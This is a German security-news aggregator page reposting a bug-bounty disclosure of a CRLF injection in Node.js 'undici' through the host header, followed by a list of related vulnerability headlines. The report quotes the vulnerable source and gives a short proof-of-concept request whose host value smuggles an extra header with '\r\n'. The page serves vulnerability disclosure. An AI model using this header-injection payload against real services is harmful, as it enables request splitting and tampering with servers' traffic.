Cookie Consent by Free Privacy Policy Generator ๐Ÿ“Œ Node.js: CRLF Injection in Nodejs โ€˜undiciโ€™ via host

๐Ÿ  Team IT Security News

TSecurity.de ist eine Online-Plattform, die sich auf die Bereitstellung von Informationen,alle 15 Minuten neuste Nachrichten, Bildungsressourcen und Dienstleistungen rund um das Thema IT-Sicherheit spezialisiert hat.
Ob es sich um aktuelle Nachrichten, Fachartikel, Blogbeitrรคge, Webinare, Tutorials, oder Tipps & Tricks handelt, TSecurity.de bietet seinen Nutzern einen umfassenden รœberblick รผber die wichtigsten Aspekte der IT-Sicherheit in einer sich stรคndig verรคndernden digitalen Welt.

16.12.2023 - TIP: Wer den Cookie Consent Banner akzeptiert, kann z.B. von Englisch nach Deutsch รผbersetzen, erst Englisch auswรคhlen dann wieder Deutsch!

Google Android Playstore Download Button fรผr Team IT Security



๐Ÿ“š Node.js: CRLF Injection in Nodejs โ€˜undiciโ€™ via host


๐Ÿ’ก Newskategorie: Sicherheitslรผcken
๐Ÿ”— Quelle: vulners.com


image
Summary: undici library should be protects HTTP headers from CRLF injection vulnerabilities. However, CRLF injection exists in the โ€˜hostโ€™ header of undici.request api. Description: like https://hackerone.com/reports/1664019 Source code: lib/core/request.js:296 ``javascript function processHeader (request, key, val) { if (val && (typeof val === 'object' && !Array.isArray(val))) { throw new InvalidArgumentError(invalid ${key} header`) } else if (val === undefined) { return } if ( request.host === null && key.length === 4 && key.toLowerCase() === 'host' ) { // Consumed by Client request.host = val // without headerCharRegex.exec(val) } else if ( request.contentLength === null && ... Example:javascript import { request } from 'undici' const unsanitizedContentTypeInput = '12 \r\n\r\naaa:aaa' const { statusCode, headers, trailers, body } = await request('http://127.0.0.1:23333', { method: 'GET', headers: { 'content-type': 'application/json', 'host': unsanitizedContentTypeInput } }) console.log('response received', statusCode) console.log('headers', headers) for await (const data of body) { console.log('data', data) } console.log('trailers', trailers) ``` {F2100713} Impact: <[email protected] Impact... ...



๐Ÿ“Œ Node.js: CRLF Injection in Nodejs โ€˜undiciโ€™ via host


๐Ÿ“ˆ 89.27 Punkte

๐Ÿ“Œ Internet Bug Bounty: CRLF Injection in Nodejs โ€˜undiciโ€™ via host


๐Ÿ“ˆ 80.67 Punkte

๐Ÿ“Œ Internet Bug Bounty: CVE-2022-35948: CRLF Injection in Nodejs โ€˜undiciโ€™ via Content-Type


๐Ÿ“ˆ 70.51 Punkte

๐Ÿ“Œ CVE-2022-35949 | undici up to 5.8.0 on Node.js undici.request path/pathname server-side request forgery (GHSA-8qr4-xgw6-wmr3)


๐Ÿ“ˆ 61.02 Punkte

๐Ÿ“Œ CVE-2022-35948 | undici up to 5.8.0 on Node.js Content-Type Header crlf injection (GHSA-f772-66g8-q5h3)


๐Ÿ“ˆ 56.92 Punkte

๐Ÿ“Œ Node.js: Take over subdomain undici.nodejs.org.cdn.cloudflare.net


๐Ÿ“ˆ 49.79 Punkte

๐Ÿ“Œ CVE-2022-31150 | undici up to 5.7.1 Request Header crlf injection (GHSA-3cvr-822r-rqcc)


๐Ÿ“ˆ 48.32 Punkte

๐Ÿ“Œ CVE-2023-23936 | Undici prior 5.19.1 HTTP Header crlf injection (GHSA-5r9g-qh6m-jxff)


๐Ÿ“ˆ 48.32 Punkte

๐Ÿ“Œ Hastymail 1.0.1/1.0.2/1.1/1.2/1.5 SMTP Server crlf.crlf smtp_message privilege escalation


๐Ÿ“ˆ 36.93 Punkte

๐Ÿ“Œ Node.js: Undici does not use CONNECT or otherwise validate upstream HTTPS certificates when using a proxy


๐Ÿ“ˆ 34.81 Punkte

๐Ÿ“Œ Vuln: Node.js CVE-2016-5325 CRLF Injection Vulnerability


๐Ÿ“ˆ 30.72 Punkte

๐Ÿ“Œ Vuln: Node.js CVE-2016-5325 CRLF Injection Vulnerability


๐Ÿ“ˆ 30.72 Punkte

๐Ÿ“Œ Node.js: CRLF Injection in legacy url API (url.parse().hostname)


๐Ÿ“ˆ 30.72 Punkte

๐Ÿ“Œ Aligning NodeJS with the Web: Should NodeJS Implement The Same APIs as the Web Browser?


๐Ÿ“ˆ 29.97 Punkte

๐Ÿ“Œ Mozilla Critical Services: Security bug https://bugzilla.mozilla.org/oauth/authorize - CRLF Header injection via "redirect_uri" parameter


๐Ÿ“ˆ 29.32 Punkte

๐Ÿ“Œ [local] - VirtualBox 5.1.14 r112924 - Unprivileged Host User to Host Kernel Privilege Escalation via ALSA config


๐Ÿ“ˆ 27.53 Punkte

๐Ÿ“Œ Internet Bug Bounty: Undici ProxyAgent vulnerable to MITM


๐Ÿ“ˆ 26.21 Punkte

๐Ÿ“Œ CVE-2022-32210 | Undici.ProxyAgent certificate validation (GHSA-pgw7-wx7w-2w33)


๐Ÿ“ˆ 26.21 Punkte

๐Ÿ“Œ Internet Bug Bounty: [CVE-2022-35949]: undici.request vulnerable to SSRF using absolute / protocol-relative URL on pathname


๐Ÿ“ˆ 26.21 Punkte

๐Ÿ“Œ CVE-2023-45143 | Undici up to 5.26.0 Header information disclosure (GHSA-q768-x9m6-m9qp)


๐Ÿ“ˆ 26.21 Punkte

๐Ÿ“Œ Internet Bug Bounty: Cookie headers are not cleared in cross-domain redirect in undici-fetch


๐Ÿ“ˆ 26.21 Punkte

๐Ÿ“Œ Node.js third-party modules: [node-df] RCE via insecure command concatenation


๐Ÿ“ˆ 24.42 Punkte

๐Ÿ“Œ WebAssembly & NodeJS (Node 8 supports WebAssembly!)


๐Ÿ“ˆ 23.59 Punkte

๐Ÿ“Œ Medium CVE-2018-21270: Nodejs Node.js


๐Ÿ“ˆ 23.59 Punkte

๐Ÿ“Œ Low Code for the NodeJS Developer (Node-RED)


๐Ÿ“ˆ 23.59 Punkte

๐Ÿ“Œ Node.js: Multiple OpenSSL error handling issues in nodejs crypto library


๐Ÿ“ˆ 23.59 Punkte

๐Ÿ“Œ traceroute Package up to 1.0.0 on Node.js Child.exec host os command injection


๐Ÿ“ˆ 22.41 Punkte

๐Ÿ“Œ Bugtraq: [CVE-2016-6484] Infoblox Network Automation CRLF Injection/ HTTP splitting


๐Ÿ“ˆ 22.11 Punkte

๐Ÿ“Œ Infoblox 7.0.1 CRLF Injection / HTTP Response Splitting


๐Ÿ“ˆ 22.11 Punkte

๐Ÿ“Œ Vuln: B21Soft BASP21 BSMTP.DLL CRLF Injection Vulnerability


๐Ÿ“ˆ 22.11 Punkte

๐Ÿ“Œ Vuln: Bottle CVE-2016-9964 CRLF Injection Security Bypass Vulnerability


๐Ÿ“ˆ 22.11 Punkte

๐Ÿ“Œ Bugtraq: [CVE-2016-6484] Infoblox Network Automation CRLF Injection/ HTTP splitting


๐Ÿ“ˆ 22.11 Punkte

๐Ÿ“Œ Infoblox 7.0.1 CRLF Injection / HTTP Response Splitting


๐Ÿ“ˆ 22.11 Punkte

๐Ÿ“Œ Vuln: B21Soft BASP21 BSMTP.DLL CRLF Injection Vulnerability


๐Ÿ“ˆ 22.11 Punkte

๐Ÿ“Œ Vuln: Bottle CVE-2016-9964 CRLF Injection Security Bypass Vulnerability


๐Ÿ“ˆ 22.11 Punkte











matomo